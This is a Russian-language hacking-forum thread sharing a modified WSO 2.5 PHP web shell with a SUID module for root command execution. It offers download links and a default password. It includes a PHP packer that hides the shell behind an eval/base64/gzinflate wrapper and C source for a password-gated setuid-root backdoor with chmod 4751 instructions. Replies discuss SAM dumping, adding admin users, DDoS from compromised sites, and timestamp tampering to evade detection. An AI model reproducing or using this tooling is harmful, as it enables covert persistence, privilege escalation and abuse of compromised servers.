WSO 2.5 Suid ModifiedНебезизвестный шелл WSO с добавлением модуля для работы с Suid'никами. Модификация изначально писалась под собственные нужды, но решил её выложить, так как данная модификация может пригодиться другим пользователям. На данный момент большинство пользуется этой наработкой: http://cyberguru007.blogspot.com/2011/07/wso.html Но в ней очень много больших минусов . Модификация: Шелл находиться исключительно в одном файле, не требуется создание нескольких файлов. Путь к Suid'нику и пароль к нему не прописан в файле - его можно указать прямо в шелле и менять не модифицируя исходный код. Вся необходимая информация храниться в COOKIE, при просмотре коде невозможно определить местоположение суидника. Шелл защищён паролем - после ввода пароля вы получаете обычный доступ, суидник нужно указать отдельно. Исправлены глюки при Upload'е, изменении настроек - теперь можно загружать файлы, менять кодировку, AJAX режим можно не переключаюсь к обычной работе. Присутствует возможность проверки работоспособности суидника до подключения шелла. Передача данных происходит через встроенную функцию wsoEx. Скрин: Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами. Использование данного продукта в незаконных целях грозит уголовной ответственностью. Код в аттаче . Модификация писалась для личного использования, что возможны глюки. Пароль - root.
имхо и без этого можно было обойтись, просто немного модифицируя wsoEx хотя, посмотрим.. любой труд нужно оценить
Скачать запакованную версию: http://zalil.ru/31520955 Если кому то нужно добавить ещё некоторые возможности - пишите, сделаю. UDP: Под рукой нет винды
сделай поддержку WIN вкладку, где элементарным нажатием клавиши, можно было создать админа с правами на удаленное подключение. кнопку на скачивание SAM файла и т.п. для ВЫНей. чтобы уже совсем облениться и не писать вручную net user /ADD =)))))))
отправка GET/POST запросов, с поправкой хидера реализовать думаю лучше через сокеты, не везде есть курл
Например DDOS из армии шеллов))) А так вещь вообще действительно полезная, например для анонимной работы с дырами на других сайтах и тд...
я вот тока заметил а что означает слово Modificed? есть слова Modified, и Modificated а вот чо значит modificed, я не понял
Дополню: Шелл должен иметь как можно больше возможностей, и в тоже время иметь компактный размер. добавлять всё что не попадает под эту категорию не надо. Всё что считаю нужным добавлю как будет время. Тема перенесена в Уязвимости по моей просьбе.
Я делал это. Выложу свой вариант, может пригодится. Шелл тачит себя датой изменения соседнего файла, а если файла нету, то датой изменения соседней директории. Потом находит в директории шелла время модификации, которое произошло максимально недавно, и тачит директорию этой датой. Только это сделано в оригинальном WSO 2.5, а не в модификации из первого поста. Code: http://www.sendspace.com/file/ik9e02 Запускается нажатием на Magic Touch в менюшке, сам код лежит в функции actionMagicTouch.
PHP: <?php $header = '<?php $auth_pass = "63a9f0ea7bb98050796b649e85481845"; $color = "#df5"; $default_action = \'FilesMan\'; $default_use_ajax = true; $default_charset = \'Windows-1251\'; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\''; $footer = '\'\x29\x29\x29\x3B",".");?>'; $content = php_strip_whitespace('in.txt'); $content = trim(preg_replace('/<\?(php)?/', '', $content)); echo $header . base64_encode(gzdeflate($content, 9)) . $footer;
При использовании Suid на FreeBSP возникает ошибка Query did not return anything Так же при скачивании файлов с данной модификации, так же возникают ошибки
Query did not return anything - Эта ошибка возникает когда функции system, exec(Добавил, поскольку раньше в таком случае ничего не возвращалось)... Запрещены или ничего не возвращают. Проверьте, работают ли они. Если да - будем разбираться.
Они работают, но всё ровно возникает ошибка при использовании Suid. из phpinfo видно что работают: Disabled PHP Functions: none После нажатия на кнопку YES, вылетает эта ошибка
Возможно не найден php интерпретатор, попробуй выполнить в консоли: Работать будет/не будет - Пиши в ПМ.
Платно не работаю. Доработанный скрипт прикрепил в первом посте. Теперь существует возможность указать путь к php интерпретатору.
Code: #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) { if(argc == 3){ if(strcmp(argv[1],"cool_hack") == 0){ setgid(0); setuid(0); system(argv[2]); } } return 0; } Using: ./suid cool_hack id [path] [password] [command] Пароль, разумеется можно изменить. В сурсе видно где Скомпилируй (хоть на том же шелле с gcc) и используй. Ну и, разумеется, не забывай уже бинарнику добавлять suid-бит (к примеру chmod 4751 suidfilename). P.S.: Скомпилированный суидник с паролем 112s233: http://rghost.ru/19777451
